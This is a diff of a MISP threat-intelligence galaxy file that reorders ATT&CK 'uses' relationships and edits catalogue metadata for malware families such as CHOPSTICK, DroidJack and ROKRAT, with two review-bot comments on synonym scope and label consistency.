+ "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", 
@@ -5156,42 +6377,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5204,34 +6390,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ 
@@ -5240,42 +6398,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5288,6 +6411,41 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ 
@@ -5295,6 +6453,69 @@ ], "type": "uses" }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
@@ -5347,12 +6568,138 @@ ], "type": "uses" }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6b62e336-176f-417b-856a-8552dd8c44e1", @@ -5396,14 +6743,7 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5424,7 +6764,7 @@ "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5437,6 +6777,13 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -5445,14 +6792,14 @@ "type": "uses" }, { - "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5485,13 +6832,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", "tags": [ @@ -5507,14 +6847,21 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5596,14 +6943,14 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5614,7 +6961,7 @@ "value": "adbupd - S0202" }, { - "description": "[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [Android version of the malware](https://attack.mitre.org/software/S0314).", + "description": "[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).", "meta": { "external_id": "S0023", "mitre_platforms": [ 
@@ -5626,10 +6973,12 @@ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", - "https://www.justice.gov/file/1080281/download" + "https://www.justice.gov/file/1080281/download", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "CHOPSTICK", + "Backdoor.SofacyX", "SPLM", "Xagent", "X-Agent", @@ -5672,20 +7021,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -5694,7 +7029,28 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
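Review bot: `Backdoor.SofacyX` added to `synonyms` in `@@ -5626,10 +6973,12 @@` is a vendor detection name, and MISP uses galaxy synonyms for matching and correlation, so any event carrying that detection name will now be tied to CHOPSTICK/X-Agent. The only source given is the Symantec post added to `refs` on the line above; I cannot confirm from the diff whether that signature is specific to X-Agent or covers other Sofacy tooling, and if it is the latter, correlation on this synonym will over-attribute. Worth verifying the scope against the reference before relying on the synonym for automatic tagging. The enclosing entry (S0023) starts and ends outside this hunk.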
@@ -5715,14 +7071,7 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5736,14 +7085,7 @@ "type": "uses" }, { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5757,7 +7099,28 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5768,7 +7131,7 @@ "value": "CHOPSTICK - S0023" }, { - "description": "[DroidJack RAT](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", "meta": { "external_id": "S0320", "mitre_platforms": [ @@ -5792,14 +7155,14 @@ "type": "uses" }, { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5869,20 +7232,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ 
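Review bot: Only the description is renamed from `[DroidJack RAT]` to `[DroidJack]` in `@@ -5768,7 +7131,7 @@`; the entry's `value` line lies outside every hunk of this entry and therefore keeps its previous label, so if it still reads `DroidJack RAT - S0320` the tag name and the description now disagree. Either form is fine on its own, but `value` is what MISP tags are built from, so the two should be kept consistent, and a rename of `value` has compatibility cost for consumers that already pin on the old tag. Please confirm which label the upstream S0320 object now uses and align the two, or leave a note if the divergence is intentional. The enclosing entry begins in this hunk and ends outside it.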
@@ -5890,6 +7239,27 @@ ], "type": "uses" }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -5898,14 +7268,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5925,20 +7302,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ 
@@ -5946,34 +7309,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -5981,6 +7316,27 @@ ], "type": "uses" }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65", "tags": [ @@ -5989,7 +7345,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6037,13 +7400,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -6051,20 +7407,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -6073,28 +7415,7 @@ "type": "uses" }, { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6114,12 +7435,54 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", @@ -6147,6 +7510,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "41e3fd01-7b83-471f-835d-d2b1dc9a770c", @@ -6176,7 +7546,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6190,7 +7560,7 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6210,8 +7580,8 @@ "refs": [ "https://attack.mitre.org/software/S0240", "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" ], "synonyms": [ "ROKRAT" @@ -6219,7 +7589,28 @@ }, "related": [ { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6240,21 +7631,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
